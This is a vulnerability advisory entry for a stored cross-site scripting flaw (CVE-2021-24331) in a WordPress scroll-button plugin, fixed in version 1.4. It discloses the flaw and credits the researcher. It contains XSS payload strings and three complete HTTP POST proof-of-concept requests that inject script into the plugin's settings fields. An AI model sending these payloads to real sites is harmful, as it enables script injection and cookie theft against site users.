WordPress Plugin Vulnerabilities

Smooth Scroll Page Up/Down Buttons < 1.4 - Authenticated Stored XSS

Description

The plugin did not properly sanitise and validate its settings, such as psb_distance, psb_buttonsize, psb_speed, only validating them client side. This could allow high privilege users (such as admin) to set XSS payloads in them

Proof of Concept

### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie); "

[$] " autofocus=autofocus onfocus=alert(document.domain); "



### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13



### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13



### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22

Affects Plugins

Plugin icon
smooth-page-scroll-updown-buttons
Fixed in 1.4

References

CVE
CVE-2021-24331
URL
https://m0ze.ru/vulnerability/[2021-04-24]-[WordPress]-[CWE-79]-Smooth-Scroll-Page-UpDown-Buttons-WordPress-Plugin-v1.3.txt

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
5.5 (medium)

Miscellaneous

Original Researcher
m0ze
Submitter
m0ze
Submitter website
https://m0ze.ru
Submitter twitter
vladm0ze
Verified
Yes
WPVDB ID
2c7ca586-def8-4723-b779-09d7f37fa1ab

Timeline

Publicly Published
2021-05-17 (about 3 years ago)
Added
2021-05-17 (about 3 years ago)
Last Updated
2021-05-18 (about 2 years ago)

Other

Published
Title
Published
2021-11-01
Title
Shop Page WP < 1.2.8 - Admin+ Stored Cross-Site Scripting
Published
2021-12-27
Title
Image Hover Effects Ultimate < 9.7.1 - Reflected Cross-Site Scripting
Published
2016-04-26
Title
Gnucommerce < 0.5.7-beta - XSS
Published
2024-02-29
Title
Exclusive Addons for Elementor < 2.6.9.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Covid-19 Stats Widget
Published
2022-03-28
Title
Autolinks <= 1.0.1 - Stored Cross-Site Scripting via CSRF